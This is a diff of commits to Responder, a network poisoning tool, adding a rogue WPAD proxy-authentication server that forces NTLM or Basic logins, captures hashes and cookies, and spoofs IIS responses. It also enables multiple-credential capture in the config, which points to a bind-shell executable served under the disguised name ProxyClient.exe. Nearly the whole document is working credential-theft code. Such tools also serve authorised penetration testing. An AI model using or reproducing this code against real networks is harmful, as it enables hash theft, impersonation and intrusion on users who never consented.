Minor fixes

Using Trans pipes instead of read/writes & fixed low priv bug which drops you in a shell while the user has no rights
updated version number
2025-12-08 13:41:30 +00:00 · 2016-10-04 21:28:24 -03:00 · 2016-10-04 21:19:08 -03:00 · 2016-10-02 23:47:10 -03:00 · 2016-10-02 23:41:00 -03:00 · 2016-10-02 23:39:25 -03:00
19 changed files with 2378 additions and 140 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -2,4 +2,4 @@
 *.db
 *.txt
 *.log
-logs/*
+
--- a/README.md
+++ b/README.md
@@ -89,7 +89,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c
 ## Considerations ##
- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.
+- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
 - If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
@@ -121,7 +121,7 @@ Running the tool:
 Typical Usage Example:
-    ./Responder.py -I eth0 -rFv
+    ./Responder.py -I eth0 -rPv
 Options:
@@ -131,6 +131,11 @@ Options:
 	                        BROWSER, LLMNR requests without responding.
 	  -I eth0, --interface=eth0
 	                        Network interface to use.
          -i 10.0.0.21, --ip=10.0.0.21
                                Local IP to use (only for OSX)
          -e 10.0.0.22, --externalip=10.0.0.22
                                Poison all requests with another IP address than
                                Responder's one.
 	  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
 	  -r, --wredir          Enable answers for netbios wredir suffix queries.
 	                        Answering to wredir will likely break stuff on the
@@ -148,8 +153,12 @@ Options:
 	  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
 	                        retrieval. This may cause a login prompt. Default:
 	                        Off
 	  -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt) 
                                authentication for the proxy. WPAD doesn't need to
                                be ON. This option is highly effective when combined
                                with -r. Default: Off
 	  --lm                  Force LM hashing downgrade for Windows XP/2003 and
-	                        earlier. Default: False
+	                        earlier. Default: Off
 	  -v, --verbose         Increase verbosity.
--- a/Responder.conf
+++ b/Responder.conf
@@ -42,20 +42,25 @@ RespondToName =
 ; Specific IP Addresses not to respond to (default = None)
 ; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
-DontRespondTo = 
+DontRespondTo =
 ; Specific NBT-NS/LLMNR names not to respond to (default = None)
 ; Example: DontRespondTo = NAC, IPS, IDS
-DontRespondToName =
+DontRespondToName = ISATAP
 ; If set to On, we will stop answering further requests from a host
-; if a hash hash been previously captured for this host.
+; if a hash has been previously captured for this host.
 AutoIgnoreAfterSuccess = Off
 ; If set to On, we will send ACCOUNT_DISABLED when the client tries
 ; to authenticate for the first time to try to get different credentials.
 ; This may break file serving and is useful only for hash capture
-CaptureMultipleCredentials = Off
+CaptureMultipleCredentials = On
 ; If set to On, we will write to file all hashes captured from the same host. 
 ; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto, 
 ; domain\popo, domain\zozo. Recommended value: On, capture everything.
 CaptureMultipleHashFromSameHost = On
 [HTTP Server]
@@ -79,7 +84,7 @@ ExeFilename = files/BindShell.exe
 ExeDownloadName = ProxyClient.exe
 ; Custom WPAD Script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
+WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
 ; HTML answer to inject in HTTP responses (before </body> tag).
 ; Set to an empty string to disable.
--- a/Responder.py
+++ b/Responder.py
@@ -20,13 +20,16 @@ import ssl
 from SocketServer import TCPServer, UDPServer, ThreadingMixIn
 from threading import Thread
 from utils import *
-
+import struct
 banner()
 parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
 parser.add_option('-A','--analyze',        action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
-parser.add_option('-I','--interface',      action="store",      help="Network interface to use", dest="Interface", metavar="eth0", default=None)
+parser.add_option('-I','--interface',      action="store",      help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None)
-parser.add_option('-i','--ip',      action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
+parser.add_option('-i','--ip',             action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
 parser.add_option('-e', "--externalip",    action="store",      help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP",  metavar="10.0.0.22", default=None)
 parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
 parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
 parser.add_option('-d', '--NBTNSdomain',   action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
@@ -34,6 +37,9 @@ parser.add_option('-f','--fingerprint',    action="store_true", help="This optio
 parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
 parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
 parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
 parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
 parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
 options, args = parser.parse_args()
@@ -74,6 +80,16 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 				pass
 		TCPServer.server_bind(self)
 class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
 				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
 			except:
 				pass
                self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
 		TCPServer.server_bind(self)
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.251"
@@ -110,6 +126,7 @@ ThreadingUDPServer.allow_reuse_address = 1
 ThreadingTCPServer.allow_reuse_address = 1
 ThreadingUDPMDNSServer.allow_reuse_address = 1
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
 ThreadingTCPServerAuth.allow_reuse_address = 1
 def serve_thread_udp_broadcast(host, port, handler):
 	try:
@@ -157,6 +174,17 @@ def serve_thread_tcp(host, port, handler):
 	except:
 		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
 def serve_thread_tcp_auth(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
 			server = ThreadingTCPServerAuth((settings.Config.Bind_To, port), handler)
 			server.serve_forever()
 		else:
 			server = ThreadingTCPServerAuth((host, port), handler)
 			server.serve_forever()
 	except:
 		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
 def serve_thread_SSL(host, port, handler):
 	try:
@@ -202,6 +230,10 @@ def main():
 			from servers.HTTP_Proxy import HTTP_Proxy
 			threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
 		if settings.Config.ProxyAuth_On_Off:
 		        from servers.Proxy_Auth import Proxy_Auth
 		        threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,)))
 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:
 				from servers.SMB import SMB1LM
--- a/logs/.gitignore
+++ b/logs/.gitignore
--- a/packets.py
+++ b/packets.py
@@ -19,6 +19,7 @@ import settings
 from base64 import b64decode, b64encode
 from odict import OrderedDict
 from utils import HTTPCurrentDate, RespondWithIPAton
 # Packet class handling all packet generation (see odict.py).
 class Packet():
@@ -56,7 +57,7 @@ class NBT_Ans(Packet):
 	def calculate(self,data):
 		self.fields["Tid"] = data[0:2]
 		self.fields["NbtName"] = data[12:46]
-		self.fields["IP"] = settings.Config.IP_aton
+                self.fields["IP"] = RespondWithIPAton()
 # DNS Answer Packet
 class DNS_Ans(Packet):
@@ -82,7 +83,7 @@ class DNS_Ans(Packet):
 	def calculate(self,data):
 		self.fields["Tid"] = data[0:2]
 		self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
-		self.fields["IP"] = settings.Config.IP_aton
+                self.fields["IP"] = RespondWithIPAton()
 		self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
 # LLMNR Answer Packet
@@ -110,7 +111,7 @@ class LLMNR_Ans(Packet):
 	])
 	def calculate(self):
-		self.fields["IP"] = settings.Config.IP_aton
+                self.fields["IP"] = RespondWithIPAton()
 		self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
 		self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1]
 		self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1]
@@ -204,11 +205,10 @@ class NTLM_Challenge(Packet):
 class IIS_Auth_401_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
 		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("CRLF",          "\r\n"),
 	])
@@ -216,11 +216,10 @@ class IIS_Auth_401_Ans(Packet):
 class IIS_Auth_Granted(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
 		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
 		("CRLF",          "\r\n\r\n"),
@@ -232,13 +231,12 @@ class IIS_Auth_Granted(Packet):
 class IIS_NTLM_Challenge_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWWAuth",       "WWW-Authenticate: NTLM "),
 		("Payload",       ""),
 		("Payload-CRLF",  "\r\n"),
 		("PoweredBy",     "X-Powered-By: ASP.NC0CD7B7802C76736E9B26FB19BEB2D36290B9FF9A46EDDA5ET\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("CRLF",          "\r\n"),
 	])
@@ -249,11 +247,10 @@ class IIS_NTLM_Challenge_Ans(Packet):
 class IIS_Basic_401_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
 		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("AllowOrigin",   "Access-Control-Allow-Origin: *\r\n"),
 		("AllowCreds",    "Access-Control-Allow-Credentials: true\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
@@ -264,10 +261,9 @@ class IIS_Basic_401_Ans(Packet):
 class WPADScript(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
-		("ServerTlype",    "Server: Microsoft-IIS/6.0\r\n"),
+		("ServerTlype",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
 		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
 		("CRLF",          "\r\n\r\n"),
@@ -280,16 +276,15 @@ class ServeExeFile(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
 		("ContentType",   "Content-Type: application/octet-stream\r\n"),
-		("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
+		("LastModified",  "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
 		("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
 		("Server",        "Server: Microsoft-IIS/7.5\r\n"),
 		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("ContentDisp",   "Content-Disposition: attachment; filename="),
 		("ContentDiFile", ""),
 		("FileCRLF",      ";\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
-		("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
+		("Date",          "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
 		("Connection",    "Connection: keep-alive\r\n"),
 		("X-CCC",         "US\r\n"),
 		("X-CID",         "2\r\n"),
@@ -303,13 +298,12 @@ class ServeHtmlFile(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
 		("ContentType",   "Content-Type: text/html\r\n"),
-		("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
+		("LastModified",  "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
 		("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
 		("Server",        "Server: Microsoft-IIS/7.5\r\n"),
 		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
-		("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
+		("Date",          "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
 		("Connection",    "Connection: keep-alive\r\n"),
 		("CRLF",          "\r\n"),
 		("Payload",       "jj"),
@@ -317,6 +311,68 @@ class ServeHtmlFile(Packet):
 	def calculate(self):
 		self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 ##### WPAD Auth Packets #####
 class WPAD_Auth_407_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
 		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "Proxy-Authenticate: NTLM\r\n"),
 		("Connection",    "Proxy-Connection: close\r\n"),
 		("Cache-Control",    "Cache-Control: no-cache\r\n"),
 		("Pragma",        "Pragma: no-cache\r\n"),
 		("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("CRLF",          "\r\n"),
 	])
 class WPAD_NTLM_Challenge_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
 		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWWAuth",       "Proxy-Authenticate: NTLM "),
 		("Payload",       ""),
 		("Payload-CRLF",  "\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("CRLF",          "\r\n"),
 	])
 	def calculate(self,payload):
 		self.fields["Payload"] = b64encode(payload)
 class WPAD_Basic_407_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
 		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
 		("Connection",    "Proxy-Connection: close\r\n"),
 		("Cache-Control",    "Cache-Control: no-cache\r\n"),
 		("Pragma",        "Pragma: no-cache\r\n"),
 		("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("CRLF",          "\r\n"),
 	])
 ##### WEB Dav Stuff #####
 class WEBDAV_Options_Answer(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
 		("Allow",         "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
 		("Connection",    "Connection: Keep-Alive\r\n"),
 		("Content-Type",  "Content-Type: text/html\r\n"),
 		("CRLF",          "\r\n"),
 	])
 ##### FTP Packets #####
 class FTPPacket(Packet):
 	fields = OrderedDict([
@@ -1540,3 +1596,5 @@ class SMB2Session2Data(Packet):
 		("SecBlobOffSet",   "\x00\x00\x00\x00"),
    ])
--- a/poisoners/MDNS.py
+++ b/poisoners/MDNS.py
@@ -36,7 +36,6 @@ def Poisoned_MDNS_Name(data):
 	data = data[12:]
 	return data[:len(data)-5]
 class MDNS(BaseRequestHandler):
 	def handle(self):
 		MADDR = "224.0.0.251"
@@ -56,7 +55,7 @@ class MDNS(BaseRequestHandler):
 			if Parse_IPV6_Addr(data):
 				Poisoned_Name = Poisoned_MDNS_Name(data)
-				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
+				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton())
 				Buffer.calculate()
 				soc.sendto(str(Buffer), (MADDR, MPORT))
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@@ -14,18 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
 from SocketServer import BaseRequestHandler, StreamRequestHandler
 from base64 import b64decode
 import struct
 from utils import *
 from packets import NTLM_Challenge
-from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
+from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer
 from packets import WPADScript, ServeExeFile, ServeHtmlFile
 # Parse NTLMv1/v2 hash.
-def ParseHTTPHash(data, client):
+def ParseHTTPHash(data, client, module):
 	LMhashLen    = struct.unpack('<H',data[12:14])[0]
 	LMhashOffset = struct.unpack('<H',data[16:18])[0]
 	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
@@ -43,9 +43,8 @@ def ParseHTTPHash(data, client):
 		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
 		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
 		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
 		SaveToDb({
-			'module': 'HTTP', 
+			'module': module, 
 			'type': 'NTLMv1', 
 			'client': client, 
 			'host': HostName, 
@@ -63,9 +62,9 @@ def ParseHTTPHash(data, client):
 		HostNameOffset = struct.unpack('<H',data[48:50])[0]
 		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
 		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
-
+                 
 		SaveToDb({
-			'module': 'HTTP', 
+			'module': module, 
 			'type': 'NTLMv2', 
 			'client': client, 
 			'host': HostName, 
@@ -104,14 +103,46 @@ def GrabReferer(data, host):
 		return Referer
 	return False
 def SpotFirefox(data):
 	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
 	if UserAgent:
                print text("[HTTP] %s" % color("User-Agent        : "+UserAgent[0], 2))
                IsFirefox = re.search('Firefox', UserAgent[0])
                if IsFirefox:
                        print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1)
                        print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1)
                        return True
                else:
 	               return False
 def WpadCustom(data, client):
 	Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
-	if Wpad:
+	if Wpad and SpotFirefox(data):
 		Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
 		Buffer.calculate()
 		return str(Buffer)
 	if Wpad and SpotFirefox(data) == False:
 		Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
 		Buffer.calculate()
 		return str(Buffer)
 	return False
 def IsWebDAV(data):
        dav = re.search('PROPFIND', data)
        if dav:
              return True
        else:
              return False
 def ServeOPTIONS(data):
 	WebDav= re.search('OPTIONS', data)
 	if WebDav:
 		Buffer = WEBDAV_Options_Answer()
 		return str(Buffer)
 	return False
 def ServeFile(Filename):
 	with open (Filename, "rb") as bk:
 		return bk.read()
@@ -125,7 +156,6 @@ def RespondWithFile(client, filename, dlname=None):
 	Buffer.calculate()
 	print text("[HTTP] Sending file %s to %s" % (filename, client))
 	return str(Buffer)
 def GrabURL(data, host):
@@ -138,6 +168,7 @@ def GrabURL(data, host):
 	if POST and settings.Config.Verbose:
 		print text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5)))
 		if len(''.join(POSTDATA)) > 2:
 			print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())
@@ -155,10 +186,12 @@ def PacketSequence(data, client):
 		return RespondWithFile(client, settings.Config.Html_Filename)
 	WPAD_Custom = WpadCustom(data, client)
-	
+        # Webdav
        if ServeOPTIONS(data):
                return ServeOPTIONS(data)
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
 		if Packet_NTLM == "\x01":
 			GrabURL(data, client)
 			GrabReferer(data, client)
@@ -170,15 +203,19 @@ def PacketSequence(data, client):
 			Buffer_Ans = IIS_NTLM_Challenge_Ans()
 			Buffer_Ans.calculate(str(Buffer))
 			return str(Buffer_Ans)
 		if Packet_NTLM == "\x03":
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
-			ParseHTTPHash(NTLM_Auth, client)
+                        if IsWebDAV(data):
                                 module = "WebDAV"
                        else:
                                 module = "HTTP"
 			ParseHTTPHash(NTLM_Auth, client, module)
 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 				print text("[HTTP] WPAD (auth) file sent to %s" % client)
 				return WPAD_Custom
 			else:
 				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
@@ -204,6 +241,7 @@ def PacketSequence(data, client):
 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 			if settings.Config.Verbose:
 				print text("[HTTP] WPAD (auth) file sent to %s" % client)
 			return WPAD_Custom
 		else:
 			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
@@ -214,18 +252,21 @@ def PacketSequence(data, client):
 			Response = IIS_Basic_401_Ans()
 			if settings.Config.Verbose:
 				print text("[HTTP] Sending BASIC authentication request to %s" % client)
 		else:
 			Response = IIS_Auth_401_Ans()
 			if settings.Config.Verbose:
 				print text("[HTTP] Sending NTLM authentication request to %s" % client)
 		return str(Response)
 # HTTP Server class
 class HTTP(BaseRequestHandler):
 	def handle(self):
 		try:
-			while True:
+                	for x in range(2):   
-				self.request.settimeout(1)
+				self.request.settimeout(3)
 				data = self.request.recv(8092)
 				Buffer = WpadCustom(data, self.client_address[0])
@@ -249,19 +290,18 @@ class HTTPS(StreamRequestHandler):
 	def handle(self):
 		try:
-			while True:
+			data = self.exchange.recv(8092)
-				data = self.exchange.recv(8092)
+			self.exchange.settimeout(0.5)
-				self.exchange.settimeout(0.5)
+			Buffer = WpadCustom(data,self.client_address[0])
 				Buffer = WpadCustom(data,self.client_address[0])
-				if Buffer and settings.Config.Force_WPAD_Auth == False:
+			if Buffer and settings.Config.Force_WPAD_Auth == False:
-					self.exchange.send(Buffer)
+				self.exchange.send(Buffer)
-					if settings.Config.Verbose:
+				if settings.Config.Verbose:
-						print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
+					print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
-				else:
+			else:
-					Buffer = PacketSequence(data,self.client_address[0])
+				Buffer = PacketSequence(data,self.client_address[0])
-					self.exchange.send(Buffer)
+				self.exchange.send(Buffer)
 		except:
 			pass
--- a/servers/HTTP_Proxy.py
+++ b/servers/HTTP_Proxy.py
@@ -344,3 +344,4 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 	do_POST = do_GET
 	do_PUT  = do_GET
 	do_DELETE=do_GET
--- a/servers/MSSQL.py
+++ b/servers/MSSQL.py
@@ -146,5 +146,6 @@ class MSSQL(BaseRequestHandler):
 				if data[0] == "\x11":  # NegoSSP Auth
 					ParseSQLHash(data,self.client_address[0])
-		except socket.timeout:
+		except:
 			self.request.close()
                        pass
--- a/servers/Proxy_Auth.py
+++ b/servers/Proxy_Auth.py
@@ -0,0 +1,111 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
 # (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 # GNU General Public License for more details.
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import SocketServer
 from HTTP import ParseHTTPHash
 from packets import *
 from utils import *
 def GrabUserAgent(data):
 	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
        if UserAgent:
           print text("[Proxy-Auth] %s" % color("User-Agent        : "+UserAgent[0], 2))
 def GrabCookie(data):
 	Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
 	if Cookie:
 		Cookie = Cookie.group(0).replace('Cookie: ', '')
 		if len(Cookie) > 1:
                        if settings.Config.Verbose:
 			        print text("[Proxy-Auth] %s" % color("Cookie           : "+Cookie, 2))
 		return Cookie
 	return False
 def GrabHost(data):
 	Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
 	if Host:
 		Host = Host.group(0).replace('Host: ', '')
                if settings.Config.Verbose:
 		        print text("[Proxy-Auth] %s" % color("Host             : "+Host, 2))
 		return Host
 	return False
 def PacketSequence(data, client):
 	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)	
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
 		if Packet_NTLM == "\x01":
 			if settings.Config.Verbose:
 				print text("[Proxy-Auth] Sending NTLM authentication request to %s" % client)
 			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
 			Buffer.calculate()
 			Buffer_Ans = WPAD_NTLM_Challenge_Ans()
 			Buffer_Ans.calculate(str(Buffer))
 			return str(Buffer_Ans)
 		if Packet_NTLM == "\x03":
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
